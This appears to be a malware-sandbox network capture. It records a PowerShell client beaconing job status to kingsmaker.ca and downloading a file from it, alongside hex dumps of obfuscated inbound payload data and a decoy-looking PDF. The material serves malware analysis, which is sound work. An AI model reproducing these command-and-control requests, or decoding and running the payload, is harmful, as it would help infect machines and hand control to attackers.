cloudflare CF-RAY: 8ea1305e9e9509f7-LAS server-timing: cfL4;desc="?proto=TCP&rtt=159406&min_rtt=159145&rtt_var=33967&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1002&delivery_rate=23947&cwnd=252&unsent_bytes=0&cid=a2080a1502d808e1&ts=659&x=0"
2024-11-29 08:22:16 UTC	262	IN	Data Raw: 25 71 63 79 79 76 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 63 49 4f 60 57 6a 4b 6e 5b 44 65 6f 62 44 53 53 63 31 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 64 54 4b 42 58 31 69 42 62 33 57 55 50 6d 6d 54 4c 54 6d 6f 56 6d 62 30 60 6c 4f 74 63 49 65 6a 53 33 79 33 58 6c 6a 34 60 30 71 59 55 6f 6d 6d 56 44 48 76 58 57 62 34 65 54 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 49 56 6f 5b 6b 60 54 47 77 52 6a 65 73 5b 30 43 55 50 59 65 51 64 54 47 73 58 57 4f 43 65 46 4b 48 54 56 65 4a 53 30 71 76 58 6a 65 56 50 33 57 58 54 6c 79 6b 64 55 57 4f 56 6d 62 30 Data Ascii: %qcyyv<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#cIO`WjKn[DeobDSSc14E`TGoRTOC[1mEPVeKdTKBX1iBb3WUPmmTLTmoVmb0`lOtcIejS3y3Xlj4`0qYUommVDHvXWb4eTSSc3eKP1GoRTOC[1mIVo[k`TGwRjes[0CUPYeQdTGsXWOCeFKHTVeJS0qvXjeVP3WXTlykdUWOVmb0
2024-11-29 08:22:16 UTC	1369	IN	Data Raw: 4b 50 30 4b 76 52 32 6d 7b 62 44 6d 48 62 31 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 52 63 56 47 59 64 46 79 53 63 6c 76 76 56 6d 69 4e 58 6a 71 49 63 46 53 4b 53 45 43 6f 52 6a 65 60 62 46 4b 49 57 6a 4f 6d 56 47 4b 72 58 7b 47 7b 60 33 47 56 4c 46 65 4c 57 31 6e 31 58 6b 4f 4b 5b 31 71 46 60 49 5b 6b 60 32 53 72 5b 57 44 76 52 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 42 4e 54 53 53 63 31 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 64 54 4b 58 58 33 30 72 4c 47 71 55 50 6b 43 69 53 30 57 6f 56 6d 62 30 60 6c 4f 74 63 49 65 6a 53 30 5b 73 55 45 4b 52 63 47 6a 7b 52 6b 57 6b 52 47 4b 72 56 6a 4f 42 60 56 57 58 54 6c 79 6b 64 54 48 76 58 6f 6d 42 4c 46 47 49 57 56 65 68 4c 30 58 76 58 31 69 56 4c 44 6d 49 56 6f Data Ascii: KP0KvR2m{bDmHb14E`TGoRTOC[1mEPVeKP1GoRTORcVGYdFySclvvVmiNXjqIcFSKSECoRje`bFKIWjOmVGKrX{G{`3GVLFeLW1n1XkOK[1qF`I[k`2Sr[WDvR1mEPVeKP1GoRTOBNTSSc14E`TGoRTOC[1mEPVeKdTKXX30rLGqUPkCiS0WoVmb0`lOtcIejS0[sUEKRcGj{RkWkRGKrVjOB`VWXTlykdTHvXomBLFGIWVehL0XvX1iVLDmIVo
2024-11-29 08:22:16 UTC	1369	IN	Data Raw: 62 44 6d 48 62 31 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 53 4c 46 69 4c 57 6b 47 6a 57 30 54 79 56 6d 4b 52 60 54 47 71 54 6c 30 72 62 30 71 55 50 6c 79 6d 53 33 79 37 5b 44 69 4f 4f 6a 6d 45 54 6c 30 69 57 32 69 72 57 54 65 46 4c 46 47 45 52 54 34 45 5b 7b 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 34 50 6a 57 60 57 32 69 72 5b 44 65 57 5b 33 53 49 60 46 79 4b 53 30 71 76 58 6a 65 57 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 30 57 75 57 6f 53 68 4c 30 71 72 55 47 57 72 4c 47 71 59 4c 46 65 4c 57 6a 4b 6e 5b 44 65 6f 5b 31 71 49 56 6f 43 68 53 30 5b 53 56 57 69 52 63 31 6d 45 4c 54 65 68 4c 31 71 70 56 6d 44 76 52 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 42 53 47 4f 47 65 47 69 56 4c 57 71 54 57 6c 79 Data Ascii: bDmHb14E`TGoRTOC[1mEPVeSLFiLWkGjW0TyVmKR`TGqTl0rb0qUPlymS3y7[DiOOjmETl0iW2irWTeFLFGERT4E[{CMRTOC[1mEPVeKP1GoRTOC[1m4PjW`W2ir[DeW[3SI`FyKS0qvXjeWUjOqPVeKP1GoRTOC[0WuWoShL0qrUGWrLGqYLFeLWjKn[Deo[1qIVoChS0[SVWiRc1mELTehL1qpVmDvR1mEPVeKP1GoRTOBSGOGeGiVLWqTWly
2024-11-29 08:22:16 UTC	1369	IN	Data Raw: 31 4b 76 58 6c 30 52 62 47 6a 78 53 6b 43 69 57 7b 57 74 52 54 69 52 63 30 71 55 50 6c 30 69 57 32 69 72 52 54 69 6a 60 46 4f 34 50 6c 30 68 4c 30 5b 30 56 6a 4f 42 60 46 4b 75 54 56 65 60 53 30 5b 7b 56 6d 69 52 63 47 71 43 4c 44 75 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 58 33 30 56 4c 46 53 58 52 6f 57 4b 50 30 48 76 58 33 34 56 63 44 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 48 4c 44 34 45 5b 7b 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 70 52 54 5b 6a 60 46 47 58 54 56 65 60 63 55 6d 34 52 54 65 47 5b 33 4c 78 60 49 5b 6b 63 6d 47 6f 58 57 62 30 4c 47 71 58 52 6b 4b 5b 57 32 65 6f 56 56 30 56 63 56 48 7b 52 6c 79 4b 53 31 34 77 56 6d 65 4e 62 6c 47 59 4f 56 34 4b 53 31 5b 74 56 57 65 72 65 54 53 53 63 33 65 4b Data Ascii: 1KvXl0RbGjxSkCiW{WtRTiRc0qUPl0iW2irRTij`FO4Pl0hL0[0VjOB`FKuTVe`S0[{VmiRcGqCLDuKP1GoRTOC[1mEPVeKP1GoX30VLFSXRoWKP0HvX34VcDSSc3eKP1GoRTOC[1mHLD4E[{CMRTOC[1mEPVeKP1GpRT[j`FGXTVe`cUm4RTeG[3Lx`I[kcmGoXWb0LGqXRkK[W2eoVV0VcVH{RlyKS14wVmeNblGYOV4KS1[tVWereTSSc3eK
2024-11-29 08:22:16 UTC	546	IN	Data Raw: 71 58 52 6b 43 6d 54 31 4b 4b 54 7b 43 35 55 6a 38 72 64 46 4f 57 4c 45 6d 49 57 6a 5b 6a 50 6d 57 73 57 6c 4f 58 53 55 47 76 56 55 4f 4a 65 6c 4c 78 4e 56 30 6a 53 6f 69 6b 57 6b 4b 72 65 57 71 49 4e 55 4f 6b 4c 59 69 6b 54 55 4f 56 64 56 4f 75 57 6f 57 6a 53 6d 71 72 58 33 34 4e 62 46 48 78 4f 56 4f 58 53 6a 4b 33 58 6a 65 72 60 6c 47 59 57 6f 71 58 53 6f 69 54 5b 57 69 4e 4c 47 71 59 4c 49 43 4c 60 30 5b 30 56 57 65 4a 62 30 71 57 64 47 5b 53 57 49 4f 4e 50 33 6d 43 5b 31 6d 45 50 56 65 44 54 56 38 6f 52 54 4f 43 5b 33 47 59 56 56 38 4a 53 33 79 37 57 6d 57 46 53 47 50 7b 50 6c 79 68 60 54 47 31 56 6d 69 47 5b 31 30 55 60 31 34 45 60 54 47 6f 52 54 4f 42 4f 31 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 54 6f 43 6b 4c 57 5b 42 54 55 40 34 65 Data Ascii: qXRkCmT1KKT{C5Uj8rdFOWLEmIWj[jPmWsWlOXSUGvVUOJelLxNV0jSoikWkKreWqINUOkLYikTUOVdVOuWoWjSmqrX34NbFHxOVOXSjK3Xjer`lGYWoqXSoiT[WiNLGqYLICL`0[0VWeJb0qWdG[SWIONP3mC[1mEPVeDTV8oRTOC[3GYVV8JS3y7WmWFSGP{Plyh`TG1VmiG[10U`14E`TGoRTOBO1SSc3eKP1GoRTOC[1mEToCkLW[BTU@4e
2024-11-29 08:22:16 UTC	1369	IN	Data Raw: 55 6d 5b 53 57 54 34 50 58 31 65 56 65 54 6d 45 4c 56 79 6b 54 31 47 32 52 30 44 76 52 31 6d 45 50 56 65 4b 52 49 4f 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 54 55 43 6e 55 47 58 79 5b 47 65 57 4c 57 71 52 54 6c 6d 43 60 56 44 78 4e 46 65 5b 4c 6a 5b 30 52 54 65 4a 4f 56 4f 49 53 6f 71 6b 64 54 48 79 56 57 65 4f 60 54 38 32 4c 44 75 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 6d 53 6a 53 31 5b 34 5b 44 4c 79 54 56 4f 75 4e 56 71 60 56 44 34 37 52 54 4f 4a 60 6c 4b 59 54 59 57 60 56 46 69 72 52 56 6d 43 65 47 5b 75 57 6f 6d 5b 60 54 4b 34 5b 47 62 30 60 46 4f 34 50 59 53 56 4c 6c 79 30 56 6a 62 34 4c 30 54 7b 54 6b 57 68 53 30 57 6f 58 54 65 72 60 30 71 49 57 6f 57 4b 50 7b 47 42 58 33 30 6a 4c 56 4b 59 57 6f 57 6a 53 59 69 76 58 7b 4f 53 5b 31 75 Data Ascii: Um[SWT4PX1eVeTmELVykT1G2R0DvR1mEPVeKRIONP3mC[1mEPVeKP1GoTUCnUGXy[GeWLWqRTlmC`VDxNFe[Lj[0RTeJOVOISoqkdTHyVWeO`T82LDuKP1GoRTOC[1mEPmSjS1[4[DLyTVOuNVq`VD47RTOJ`lKYTYW`VFirRVmCeG[uWom[`TK4[Gb0`FO4PYSVLly0Vjb4L0T{TkWhS0WoXTer`0qIWoWKP{GBX30jLVKYWoWjSYivX{OS[1u
2024-11-29 08:22:16 UTC	1369	IN	Data Raw: 57 5b 72 63 6d 47 54 52 6a 4b 52 53 32 53 42 57 46 30 6a 50 33 4b 57 53 6a 69 56 57 54 5b 4e 57 57 57 46 4c 30 47 57 5b 44 34 53 57 6c 76 7b 54 57 53 56 50 6d 48 79 53 6a 4b 59 57 33 53 42 5b 56 75 46 53 57 6a 76 53 6a 38 53 57 54 57 35 54 57 57 6a 52 6d 47 57 4f 57 4b 53 56 46 69 42 54 6a 5b 56 50 6d 53 56 53 6a 4f 68 53 54 5b 47 57 57 57 46 56 6d 6e 76 53 6b 4f 53 57 57 4b 42 54 57 54 79 50 6d 47 75 60 44 4b 52 53 31 34 42 57 45 47 46 50 6c 57 47 53 6a 57 55 57 54 5b 4e 57 57 57 46 4f 6d 47 57 5b 44 34 53 57 6f 43 74 54 57 53 56 50 6d 4b 47 4c 54 4b 59 63 56 53 42 5b 57 57 46 53 57 5b 57 53 6a 34 53 57 54 57 37 54 57 57 52 50 6d 47 56 62 46 34 53 57 44 5b 42 54 6a 65 6a 50 6d 50 79 53 6a 4f 69 57 54 5b 47 57 57 57 46 55 6d 47 57 52 6f 53 53 57 56 53 52 Data Ascii: W[rcmGTRjKRS2SBWF0jP3KWSjiVWT[NWWWFL0GW[D4SWlv{TWSVPmHySjKYW3SB[VuFSWjvSj8SWTW5TWWjRmGWOWKSVFiBTj[VPmSVSjOhST[GWWWFVmnvSkOSWWKBTWTyPmGu`DKRS14BWEGFPlWGSjWUWT[NWWWFOmGW[D4SWoCtTWSVPmKGLTKYcVSB[WWFSW[WSj4SWTW7TWWRPmGVbF4SWD[BTjejPmPySjOiWT[GWWWFUmGWRoSSWVSR
2024-11-29 08:22:16 UTC	1369	IN	Data Raw: 34 53 57 33 53 42 54 55 43 46 50 6d 4f 57 53 6a 4b 60 4c 44 5b 44 57 57 57 46 60 57 47 57 52 6b 4b 53 57 56 53 70 54 57 5b 52 54 6d 47 75 64 44 4b 55 53 55 47 42 56 55 4f 6a 50 33 47 47 53 6a 69 5b 4c 44 5b 69 57 57 57 4a 4f 6d 47 57 55 6a 4b 53 57 59 50 7b 54 57 53 72 50 6d 44 76 53 6a 4b 55 57 33 53 42 5b 44 57 46 53 44 30 47 53 6a 30 57 57 54 58 76 54 57 57 4f 65 30 47 57 64 47 4b 53 56 47 4b 42 54 59 71 42 50 6d 53 46 53 6a 4b 6a 53 54 5b 44 54 30 57 46 54 46 50 76 53 6a 38 53 57 54 5b 33 54 57 57 52 54 6d 47 57 65 44 4b 53 4c 44 5b 42 54 30 57 46 50 6d 6e 76 53 6a 53 53 57 54 5b 4d 54 57 57 4a 65 6d 47 57 5b 47 5b 53 57 6c 79 52 54 56 30 31 50 6d 48 79 57 6a 4b 5b 4c 6c 53 45 5b 56 75 46 53 47 47 57 53 6d 47 57 57 54 5b 74 54 57 57 56 50 6d 47 59 57 Data Ascii: 4SW3SBTUCFPmOWSjK`LD[DWWWF`WGWRkKSWVSpTW[RTmGudDKUSUGBVUOjP3GGSji[LD[iWWWJOmGWUjKSWYP{TWSrPmDvSjKUW3SB[DWFSD0GSj0WWTXvTWWOe0GWdGKSVGKBTYqBPmSFSjKjST[DT0WFTFPvSj8SWT[3TWWRTmGWeDKSLD[BT0WFPmnvSjSSWT[MTWWJemGW[G[SWlyRTV01PmHyWjK[LlSE[VuFSGGWSmGWWT[tTWWVPmGYW
2024-11-29 08:22:16 UTC	1369	IN	Data Raw: 35 50 6d 4f 46 53 6a 4b 5b 57 54 5b 45 5b 46 75 46 52 47 57 57 53 6a 71 53 57 54 71 52 54 57 57 6b 4f 47 47 59 55 6b 4f 53 60 6a 4b 42 54 55 43 46 50 6d 53 46 53 6a 4f 55 57 54 5b 48 57 6d 57 46 56 6d 57 57 52 6f 4b 53 57 56 53 56 54 57 65 4e 63 6d 47 74 62 44 4b 53 4c 44 5b 42 54 33 75 46 50 33 48 76 53 6a 69 56 57 54 5b 60 57 57 57 4a 62 6d 47 57 5b 47 5b 53 57 31 34 74 54 56 34 76 50 6d 44 76 53 6a 4b 54 53 6a 5b 45 54 55 43 46 52 44 38 47 53 6c 47 53 57 54 6a 79 54 57 57 4e 50 6d 47 57 62 44 4b 53 63 56 79 42 54 6f 71 6e 50 6d 65 73 53 6a 4f 4e 57 54 5b 42 55 54 57 46 53 47 6e 76 53 6c 34 53 57 54 34 42 54 57 57 72 50 6d 47 59 5b 44 4b 53 4c 44 5b 42 54 30 57 46 50 6d 6e 76 53 6a 53 53 57 54 5b 75 57 57 57 46 55 30 47 57 53 6f 5b 53 57 56 79 42 54 57 Data Ascii: 5PmOFSjK[WT[E[FuFRGWWSjqSWTqRTWWkOGGYUkOS`jKBTUCFPmSFSjOUWT[HWmWFVmWWRoKSWVSVTWeNcmGtbDKSLD[BT3uFP3HvSjiVWT[`WWWJbmGW[G[SW14tTV4vPmDvSjKTSj[ETUCFRD8GSlGSWTjyTWWNPmGWbDKScVyBToqnPmesSjONWT[BUTWFSGnvSl4SWT4BTWWrPmGY[DKSLD[BT0WFPmnvSjSSWT[uWWWFU0GWSo[SWVyBTW
2024-11-29 08:22:16 UTC	1369	IN	Data Raw: 4c 54 5b 42 56 57 5b 46 50 6d 6e 76 53 6a 57 4f 53 54 5b 4a 54 57 57 46 4c 30 47 57 54 6f 71 53 57 56 79 42 54 57 65 31 50 6d 48 78 65 44 4b 55 57 54 5b 42 5b 44 57 46 52 46 50 76 53 6c 75 53 57 54 5b 74 54 57 57 4e 54 6d 47 56 63 46 34 53 60 6d 5b 42 54 31 5b 46 50 6d 65 72 53 6a 4f 53 60 31 5b 4b 54 30 57 46 60 6d 6e 76 52 6c 38 53 57 56 69 78 54 57 57 35 63 6d 47 73 4c 54 4b 52 4c 57 5b 42 56 56 30 6a 50 33 4b 73 53 6a 6d 57 57 54 5b 6e 54 57 57 47 4c 30 47 57 55 6a 4b 53 57 59 43 42 54 56 34 42 50 6d 44 7b 55 6a 4b 55 4c 33 53 42 58 31 57 46 53 47 47 57 53 6c 79 6a 4c 44 5b 74 54 57 57 4e 54 6d 47 56 63 46 34 53 60 6d 5b 42 54 31 5b 46 50 6d 65 72 53 6a 4f 53 60 31 5b 4b 54 30 57 46 60 6d 6e 76 52 6c 38 53 57 56 69 78 54 57 5b 6a 4c 30 47 59 65 44 4b Data Ascii: LT[BVW[FPmnvSjWOST[JTWWFL0GWToqSWVyBTWe1PmHxeDKUWT[B[DWFRFPvSluSWT[tTWWNTmGVcF4S`m[BT1[FPmerSjOS`1[KT0WF`mnvRl8SWVixTWW5cmGsLTKRLW[BVV0jP3KsSjmWWT[nTWWGL0GWUjKSWYCBTV4BPmD{UjKUL3SBX1WFSGGWSlyjLD[tTWWNTmGVcF4S`m[BT1[FPmerSjOS`1[KT0WF`mnvRl8SWVixTW[jL0GYeDK

Timestamp	Bytes transferred	Direction	Data
2024-11-29 08:22:17 UTC	283	OUT	POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b663ea0555ae9c0d65b965f4e05b0696583 HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: kingsmaker.ca Content-Length: 85
2024-11-29 08:22:17 UTC	85	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 4a 6f 62 20 69 73 20 72 75 6e 6e 69 6e 67 2e 20 4a 6f 62 20 49 44 3a 20 31 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 43 68 65 63 6b 20 6d 75 74 65 78 74 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d Data Ascii: [ "\"Job is running. Job ID: 1\"", "\"Check mutext\"", "----------"]
2024-11-29 08:22:18 UTC	989	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 08:22:18 GMT Content-Length: 0 Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OUeH4BcgJst9zgVNZNoJFAFGdyCkPe0Vcf%2BhlzhXD1tEIL%2FuVFWwhqsSCPnmF1lHQ%2FpNkS6NIAaDqnTcQjaquXtSBg7n8zE7DyWkV4nZSkJyyAi0KdlOBrtOvtJqfBjFFZRIIbwNy1%2BX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=25907&min_rtt=1458&rtt_var=31997&sent=13&recv=16&lost=0&retrans=0&sent_bytes=3102&recv_bytes=6061&delivery_rate=26684&cwnd=253&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8ea1306b1b0209fd-LAS server-timing: cfL4;desc="?proto=TCP&rtt=158957&min_rtt=158907&rtt_var=33560&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1028&delivery_rate=24091&cwnd=252&unsent_bytes=0&cid=5322e97d6e369493&ts=658&x=0"

Timestamp	Bytes transferred	Direction	Data
2024-11-29 08:22:19 UTC	388	OUT	GET /file2/31b8a1b5c89fe194298b8a9855e2443860920f3b00d19a946f931f7c332bd239766e1de8c7b2f19233540c7f291919f9c9191eff7a5de7868f190137bd7c2f225e9653c0a8361473c2464503478c32210e436919ed4dab25f52021847773e83d150bf92182d21b4dc33f01eee91ea1fa HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: kingsmaker.ca Connection: Keep-Alive
2024-11-29 08:22:20 UTC	1102	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 08:22:20 GMT Content-Type: application/octet-stream Content-Length: 78011 Connection: close content-disposition: attachment; filename=file; filename*=UTF-8''file CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3htx4Rr4vCsDSp1Kzk3BCsy13msvsi62Z0OjNKV69HI0eUWBdqWhnS0ad69zomPvo6XwXXnvm0gvLQ3oGFAd%2BoQab537S7Mjz%2B0kHN%2F3AfxFLfWlWclFK4n9nzuV2lscQrS8V6maBqxI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=31101&min_rtt=1458&rtt_var=34387&sent=15&recv=18&lost=0&retrans=0&sent_bytes=3869&recv_bytes=7061&delivery_rate=26684&cwnd=254&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8ea130755c0ba984-LAS server-timing: cfL4;desc="?proto=TCP&rtt=159061&min_rtt=158936&rtt_var=33721&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1002&delivery_rate=24038&cwnd=252&unsent_bytes=0&cid=8ebf4bacb1e4af68&ts=678&x=0"
2024-11-29 08:22:20 UTC	267	IN	Data Raw: 25 50 44 46 2d 31 2e 34 0a 25 f6 e4 fc df 0a 31 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 79 70 65 20 2f 43 61 74 61 6c 6f 67 0a 2f 50 61 67 65 73 20 32 20 30 20 52 0a 2f 4d 61 72 6b 49 6e 66 6f 20 3c 3c 0a 2f 54 79 70 65 20 2f 4d 61 72 6b 49 6e 66 6f 0a 2f 4d 61 72 6b 65 64 20 74 72 75 65 0a 3e 3e 0a 2f 53 74 72 75 63 74 54 72 65 65 52 6f 6f 74 20 33 20 30 20 52 0a 2f 56 69 65 77 65 72 50 72 65 66 65 72 65 6e 63 65 73 20 3c 3c 0a 2f 54 79 70 65 20 2f 56 69 65 77 65 72 50 72 65 66 65 72 65 6e 63 65 73 0a 2f 44 69 73 70 6c 61 79 44 6f 63 54 69 74 6c 65 20 74 72 75 65 0a 3e 3e 0a 2f 4c 61 6e 67 20 28 65 6e 29 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 34 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 69 74 6c 65 20 28 4a 44 29 0a 2f 43 72 65 61 74 6f 72 20 28 43 61 6e 76 61 29 0a 2f Data Ascii: %PDF-1.4%1 0 obj<</Type /Catalog/Pages 2 0 R/MarkInfo <</Type /MarkInfo/Marked true>>/StructTreeRoot 3 0 R/ViewerPreferences <</Type /ViewerPreferences/DisplayDocTitle true>>/Lang (en)>>endobj4 0 obj<</Title (JD)/Creator (Canva)/
2024-11-29 08:22:20 UTC	1369	IN	Data Raw: 6e 76 61 29 0a 2f 43 72 65 61 74 69 6f 6e 44 61 74 65 20 28 44 3a 32 30 32 34 31 31 31 33 31 32 34 31 31 38 2b 30 30 27 30 30 27 29 0a 2f 4d 6f 64 44 61 74 65 20 28 44 3a 32 30 32 34 31 31 31 33 31 32 34 31 31 38 2b 30 30 27 30 30 27 29 0a 2f 4b 65 79 77 6f 72 64 73 20 28 44 41 47 57 58 49 56 45 30 38 4d 2c 42 41 47 51 6b 5f 33 54 6a 35 59 29 0a 2f 41 75 74 68 6f 72 20 28 4d 61 64 67 65 20 52 79 61 6e 29 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 32 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 79 70 65 20 2f 50 61 67 65 73 0a 2f 43 6f 75 6e 74 20 32 0a 2f 4b 69 64 73 20 5b 35 20 30 20 52 20 36 20 30 20 52 5d 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 33 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 79 70 65 20 2f 53 74 72 75 63 74 54 72 65 65 52 6f 6f 74 0a 2f 4b 20 37 20 30 20 52 0a 2f 50 61 Data Ascii: nva)/CreationDate (D:20241113124118+00'00')/ModDate (D:20241113124118+00'00')/Keywords (DAGWXIVE08M,BAGQk_3Tj5Y)/Author (Madge Ryan)>>endobj2 0 obj<</Type /Pages/Count 2/Kids [5 0 R 6 0 R]>>endobj3 0 obj<</Type /StructTreeRoot/K 7 0 R/Pa
2024-11-29 08:22:20 UTC	1369	IN	Data Raw: 20 33 33 20 30 20 52 20 33 33 20 30 20 52 20 33 33 20 30 20 52 20 33 33 20 30 20 52 20 33 33 20 30 20 52 20 33 34 20 30 20 52 20 33 35 20 30 20 52 0a 33 35 20 30 20 52 20 33 35 20 30 20 52 20 33 36 20 30 20 52 20 33 37 20 30 20 52 20 33 37 20 30 20 52 20 33 37 20 30 20 52 20 33 38 20 30 20 52 20 33 39 20 30 20 52 20 33 39 20 30 20 52 20 33 39 20 30 20 52 0a 34 30 20 30 20 52 20 34 31 20 30 20 52 20 34 31 20 30 20 52 20 34 31 20 30 20 52 20 34 32 20 30 20 52 20 34 33 20 30 20 52 20 34 34 20 30 20 52 20 34 35 20 30 20 52 20 34 35 20 30 20 52 20 34 35 20 30 20 52 0a 34 36 20 30 20 52 20 34 37 20 30 20 52 20 34 37 20 30 20 52 20 34 37 20 30 20 52 20 34 38 20 30 20 52 20 34 39 20 30 20 52 20 34 39 20 30 20 52 20 34 39 20 30 20 52 20 35 30 20 30 20 52 20 35 31 Data Ascii: 33 0 R 33 0 R 33 0 R 33 0 R 33 0 R 34 0 R 35 0 R35 0 R 35 0 R 36 0 R 37 0 R 37 0 R 37 0 R 38 0 R 39 0 R 39 0 R 39 0 R40 0 R 41 0 R 41 0 R 41 0 R 42 0 R 43 0 R 44 0 R 45 0 R 45 0 R 45 0 R46 0 R 47 0 R 47 0 R 47 0 R 48 0 R 49 0 R 49 0 R 49 0 R 50 0 R 51
2024-11-29 08:22:20 UTC	1369	IN	Data Raw: 6f 62 6a 0a 3c 3c 0a 2f 54 79 70 65 20 2f 46 6f 6e 74 0a 2f 53 75 62 74 79 70 65 20 2f 54 79 70 65 30 0a 2f 42 61 73 65 46 6f 6e 74 20 2f 44 41 41 41 41 41 2b 48 4b 47 72 6f 74 65 73 6b 2d 52 65 67 75 6c 61 72 0a 2f 45 6e 63 6f 64 69 6e 67 20 2f 49 64 65 6e 74 69 74 79 2d 48 0a 2f 44 65 73 63 65 6e 64 61 6e 74 46 6f 6e 74 73 20 5b 39 34 20 30 20 52 5d 0a 2f 54 6f 55 6e 69 63 6f 64 65 20 39 35 20 30 20 52 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 31 36 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 4c 65 6e 67 74 68 20 34 37 39 35 0a 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 0a 3e 3e 0a 73 74 72 65 61 6d 0d 0a 78 9c ed 5d 5b ab 24 b9 91 7e af 5f a1 47 db b0 6a 45 28 74 83 a6 a1 4e d5 a9 61 1f 0c f6 b8 c1 cf e6 ac 67 ec e5 b4 d9 19 db b0 3f 7f d1 25 74 c9 ca 54 Data Ascii: obj<</Type /Font/Subtype /Type0/BaseFont /DAAAAA+HKGrotesk-Regular/Encoding /Identity-H/DescendantFonts [94 0 R]/ToUnicode 95 0 R>>endobj16 0 obj<</Length 4795/Filter /FlateDecode>>streamx][$~_GjE(tNag?%tT
2024-11-29 08:22:20 UTC	1369	IN	Data Raw: ac f4 df c0 d6 a2 23 8b 1c a1 40 d4 d9 b2 f2 4d db 95 3e 78 d1 fe fa fe 3b b1 48 f9 96 94 80 04 13 b4 a3 90 c9 e9 1e b5 21 69 b5 b7 51 85 55 d2 6b f4 98 a8 b3 a8 8d 90 e0 d0 08 a9 8c cf 04 de 25 36 1a c7 f5 27 d4 f5 c7 09 b0 26 ae c4 71 38 fb 45 48 09 d0 bc 3d 2b 5a 8c 0f 32 68 52 e1 6e 39 f1 41 2a 22 67 ee b4 98 80 32 c4 59 73 37 cf b4 93 16 29 d8 26 b2 50 cc 48 71 25 8d 5a 8c 59 0a b3 27 09 a0 95 ba 5b 4c 1c 44 e5 ca db bb 45 d9 05 a9 20 18 dd 69 30 b9 23 56 4b a7 43 ec df 62 29 21 25 bd f1 81 fc 72 f9 0b 28 0d 02 d2 72 2a 18 2f bd 72 1a f0 71 4d 03 af fc 72 12 8f 53 c7 1b 99 6c 7c 3a 28 a9 82 02 23 40 93 d4 2e fe eb 64 2f 39 12 1d 51 20 9d 05 a7 3d 0d 55 80 75 ee 7d 62 83 01 a5 8d 5b 49 a1 c4 97 ee 09 95 92 46 bc 9e c8 93 c4 ad 94 e0 4a ee d7 be e4 6a Data Ascii: #@M>x;H!iQUk%6'&q8EH=+Z2hRn9A"g2Ys7)&PHq%ZY'[LDE i0#VKCb)!%r(r/rqMrSl\|:(#@.d/9Q =Uu}b[IFJj
